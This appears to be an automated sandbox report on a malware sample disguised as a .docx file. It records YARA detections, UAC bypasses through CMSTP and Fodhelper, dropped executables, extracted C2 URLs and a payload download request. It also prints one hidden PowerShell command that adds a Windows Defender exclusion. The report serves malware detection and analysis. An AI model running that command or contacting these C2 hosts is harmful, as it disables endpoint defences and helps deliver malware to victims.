              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Libraries\Pyemdbrd.PIFJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeJoe Sandbox ML: detected
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045B3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,31_2_045B3837
              Source: colorcpl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045874FD _wcslen,CoGetObject,31_2_045874FD
              UAC bypass detected (Fodhelper)
              Source: C:\Users\Public\ger.exeRegistry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

              Compliance

              barindex
              Detected unpacking (creates a PE file in dynamic memory)
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeUnpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029858B4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,14_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,14_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,14_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,14_2_00007FF64B5635B8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF64B57823C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF64B572978
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF64B587B4C
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF64B561560
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF64B5635B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589665
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,31_2_04589253
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,31_2_0459C291
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,31_2_0458C34D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,31_2_0458BD37
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045CE879 FindFirstFileExA,31_2_045CE879
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,31_2_0458880C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458783C FindFirstFileW,FindNextFileW,31_2_0458783C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,31_2_04599AF5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,31_2_0458BB30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,31_2_04587C97
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user\AppData\Local\Temp\D2F6.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile opened: C:\Users\user~1\AppData\Jump to behavior

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://wcmanagers.com/Er9/233_Pyemdbrdpps
              Source: Malware configuration extractorURLs: www.vipguyclassproject2024.space
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299D028 InternetCheckConnectionA,0_2_0299D028
              Source: Joe Sandbox ViewIP Address: 108.170.55.202 108.170.55.202
              Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wcmanagers.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459663B Sleep,URLDownloadToFileW,31_2_0459663B
              Source: global trafficHTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wcmanagers.com
              Source: global trafficDNS traffic detected: DNS query: wcmanagers.com
              Source: global trafficDNS traffic detected: DNS query: www.vipguyclassproject2024.space
              Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
